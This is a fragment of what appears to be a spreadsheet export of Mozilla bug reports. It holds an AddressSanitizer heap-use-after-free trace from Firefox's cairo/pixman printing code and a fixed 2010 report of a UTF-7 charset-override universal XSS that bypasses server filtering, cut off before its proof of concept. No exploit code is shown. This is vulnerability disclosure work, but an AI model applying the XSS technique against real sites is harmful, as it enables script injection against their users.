    #9 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #10 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #11 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #12 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #13 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #14 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #15 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #16 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #17 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #18 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #19 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #20 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #21 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #22 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #23 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #24 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #25 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #26 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #27 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #28 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #29 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #30 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #31 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #32 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #33 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #34 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #35 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #36 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #37 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #38 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #39 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #40 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #41 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #42 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #43 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #44 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #45 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #46 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #47 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #48 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #49 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #50 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #51 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #52 0x7fdb24cb0bd4 in _paint_fallback_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-paginated-surface.c:268:14
    #53 0x7fdb24cb06d9 in _paint_page /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-paginated-surface.c:404:15
    #54 0x7fdb24cafb58 in _cairo_paginated_surface_show_page /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-paginated-surface.c:466:14
    #55 0x7fdb24d1d1e1 in _moz_cairo_surface_show_page /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2541:21
    #56 0x7fdb1c3e6e3f in mozilla::gfx::PrintTargetPDF::EndPage() /home/sourc7/git/gecko-dev-asan/gfx/thebes/PrintTargetPDF.cpp:63:3
    #57 0x7fdb1bb67e4d in nsDeviceContext::EndPage() /home/sourc7/git/gecko-dev-asan/gfx/src/nsDeviceContext.cpp:581:31
    #58 0x7fdb23c9e733 in PrintPage /home/sourc7/git/gecko-dev-asan/layout/printing/ipc/RemotePrintJobParent.cpp:171:29
    #59 0x7fdb23c9e733 in mozilla::layout::RemotePrintJobParent::FinishProcessingPage(nsRefCountedHashtable&lt;nsUint64HashKey, RefPtr&lt;mozilla::gfx::RecordedDependentSurface&gt; &gt;*) /home/sourc7/git/gecko-dev-asan/layout/printing/ipc/RemotePrintJobParent.cpp:146:17
    #60 0x7fdb23c9e39c in mozilla::layout::RemotePrintJobParent::RecvProcessPage(nsTArray&lt;unsigned long&gt;&amp;&amp;) /home/sourc7/git/gecko-dev-asan/layout/printing/ipc/RemotePrintJobParent.cpp:121:5
    #61 0x7fdb1acdad14 in mozilla::layout::PRemotePrintJobParent::OnMessageReceived(IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/ipc/ipdl/PRemotePrintJobParent.cpp:301:28
    #62 0x7fdb1a64e158 in mozilla::dom::PContentParent::OnMessageReceived(IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/ipc/ipdl/PContentParent.cpp:6730:32
    #63 0x7fdb1a295159 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:2157:25
    #64 0x7fdb1a290543 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:2081:9
    #65 0x7fdb1a2929e2 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:1929:3
    #66 0x7fdb1a29385b in mozilla::ipc::MessageChannel::MessageTask::Run() /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:1960:13
    #67 0x7fdb18b9ce61 in mozilla::RunnableTask::Run() /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:472:16
    #68 0x7fdb18b925e7 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:760:26
    #69 0x7fdb18b8f635 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:611:15
    #70 0x7fdb18b8fbc8 in mozilla::TaskController::ProcessPendingMTTask(bool) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:395:36
    #71 0x7fdb18b93c74 in operator() /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:136:37
    #72 0x7fdb18b93c74 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run() /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThreadUtils.h:534:5
    #73 0x7fdb18bc036a in nsThread::ProcessNextEvent(bool, bool*) /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThread.cpp:1158:16
    #74 0x7fdb18bcbc51 in NS_ProcessNextEvent(nsIThread*, bool) /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThreadUtils.cpp:548:10
    #75 0x7fdb1a29f483 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessagePump.cpp:109:5
    #76 0x7fdb1a1081e1 in RunInternal /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:335:10
    #77 0x7fdb1a1081e1 in RunHandler /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:328:3
    #78 0x7fdb1a1081e1 in MessageLoop::Run() /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:310:3
    #79 0x7fdb22a364ba in nsBaseAppShell::Run() /home/sourc7/git/gecko-dev-asan/widget/nsBaseAppShell.cpp:137:27
    #80 0x7fdb26fd1379 in nsAppStartup::Run() /home/sourc7/git/gecko-dev-asan/toolkit/components/startup/nsAppStartup.cpp:271:30
    #81 0x7fdb2727ea23 in XREMain::XRE_mainRun() /home/sourc7/git/gecko-dev-asan/toolkit/xre/nsAppRunner.cpp:5351:22
    #82 0x7fdb2728107b in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/sourc7/git/gecko-dev-asan/toolkit/xre/nsAppRunner.cpp:5543:8
    #83 0x7fdb27281b95 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/sourc7/git/gecko-dev-asan/toolkit/xre/nsAppRunner.cpp:5606:21
    #84 0x55b255d1a773 in do_main /home/sourc7/git/gecko-dev-asan/browser/app/nsBrowserApp.cpp:220:22
    #85 0x55b255d1a773 in main /home/sourc7/git/gecko-dev-asan/browser/app/nsBrowserApp.cpp:347:16
    #86 0x7fdb34722b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
    #87 0x55b255c6d8fd in _start (/home/sourc7/git/gecko-dev-asan/objdir-ff-asan/dist/bin/firefox+0xbf8fd)
0x612004964470 is located 48 bytes inside of 264-byte region [0x612004964440,0x612004964548)
freed by thread T0 here:
    #0 0x55b255ce74ed in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7fdb24e34719 in _moz_pixman_image_unref /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman-image.c:213:2
    #2 0x7fdb24c92ae4 in _cairo_image_surface_finish /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:729:2
    #3 0x7fdb24d18694 in _moz_cairo_surface_finish /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:728:11
    #4 0x7fdb24d0f394 in _moz_cairo_surface_destroy /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:649:2
    #5 0x7fdb24c5e803 in _cairo_clip_drop_cache /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-clip.c:1303:6
    #6 0x7fdb24ce5e9f in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:987:2
    #7 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #8 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #9 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #10 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #11 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #12 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #13 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #14 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #15 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #16 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #17 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #18 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #19 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #20 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #21 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #22 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #23 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #24 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #25 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #26 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #27 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #28 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #29 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #30 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #31 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #32 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #33 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #34 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #35 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #36 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #37 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #38 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
previously allocated by thread T0 here:
    #0 0x55b255ce776d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
    #1 0x7fdb24e34740 in _pixman_image_allocate /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman-image.c:184:29
    #2 0x7fdb24d675f7 in create_bits_image_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman-bits-image.c:1340:13
    #3 0x7fdb24c92070 in _cairo_image_surface_create_with_pixman_format /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:329:20
    #4 0x7fdb24d125b2 in _cairo_surface_create_similar_scratch /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:465:15
    #5 0x7fdb24c5d633 in _cairo_clip_path_get_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-clip.c:984:15
    #6 0x7fdb24ca6377 in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3013:21
    #7 0x7fdb24ca6377 in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #8 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #9 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #10 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #11 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #12 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #13 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #14 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #15 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #16 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #17 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #18 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #19 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #20 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #21 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #22 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #23 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #24 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #25 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #26 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #27 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
    #28 0x7fdb24ca678b in _composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3029:12
    #29 0x7fdb24ca678b in _clip_and_composite_boxes /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3090:14
    #30 0x7fdb24c953b4 in _cairo_image_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:3338:11
    #31 0x7fdb24d0effe in _cairo_surface_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:2110:11
    #32 0x7fdb24c1cafd in _cairo_surface_wrapper_paint /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface-wrapper.c:148:14
    #33 0x7fdb24ce55ed in _cairo_recording_surface_replay_internal /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:855:15
    #34 0x7fdb24cfd1cd in _cairo_recording_surface_replay /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:1011:12
    #35 0x7fdb24cfd1cd in _cairo_recording_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-recording-surface.c:278:14
    #36 0x7fdb24d0e8fd in _cairo_surface_acquire_source_image /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-surface.c:1452:14
    #37 0x7fdb24c9edd5 in _pixman_image_for_surface /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1515:11
    #38 0x7fdb24c9edd5 in _pixman_image_for_pattern /home/sourc7/git/gecko-dev-asan/gfx/cairo/cairo/src/cairo-image-surface.c:1693:9
SUMMARY: AddressSanitizer: heap-use-after-free /home/sourc7/git/gecko-dev-asan/gfx/cairo/libpixman/src/pixman-image.c:549:23 in _pixman_image_validate
Shadow bytes around the buggy address:
  0x0c2480924830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2480924840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2480924850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2480924860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2480924870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2480924880: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
  0x0c2480924890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c24809248a0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c24809248b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c24809248c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c24809248d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551946==ABORTING
```</t>
        </is>
      </c>
      <c r="X6074" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6075">
      <c r="A6075" t="n">
        <v>579744</v>
      </c>
      <c r="B6075" t="inlineStr">
        <is>
          <t>2010-07-18 09:39:02 -0700</t>
        </is>
      </c>
      <c r="C6075" t="inlineStr">
        <is>
          <t>UTF-7 Universal XSS by overriding document charset using &lt;object&gt; type attribute</t>
        </is>
      </c>
      <c r="D6075" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:17 -0700</t>
        </is>
      </c>
      <c r="E6075" t="n">
        <v>1</v>
      </c>
      <c r="F6075" t="n">
        <v>1</v>
      </c>
      <c r="G6075" t="n">
        <v>3</v>
      </c>
      <c r="H6075" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6075" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6075" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6075" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6075" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6075" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6075" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6075" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q6075" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6075" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6075" t="inlineStr">
        <is>
          <t>mozilla2.0b3</t>
        </is>
      </c>
      <c r="T6075" t="n">
        <v>1</v>
      </c>
      <c r="U6075" t="n">
        <v>0</v>
      </c>
      <c r="V6075" t="n">
        <v>30</v>
      </c>
      <c r="W6075" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)
In Firefox, the "type" attribute of an &lt;object&gt; tag can override the charset of a framed HTML document, even if the document is included across origins. The charset specified in the "type" attribute overrides any charset of the document that is specified using &lt;?xml encoding="utf-8"?&gt;, &lt;meta charset="utf-8"&gt;, or &lt;meta http-equiv="Content-Type" value="text/html;charset=utf-8"&gt;. This allows an attacker to bypass server XSS filtering of angle brackets and inject arbitrary JavaScript code encoded in UTF-7 into web sites. It works on web sites that do not specify a charset in the Content-Type header (416 out of the Alexa top 1000). It does not work on web sites that specify a charset in the Content-Type header (584 out of the Alexa top 1000).
Reproducible: Always
Steps to Reproduce:
Here's a proof of concept exploit, using bankofthewest.com as an example:
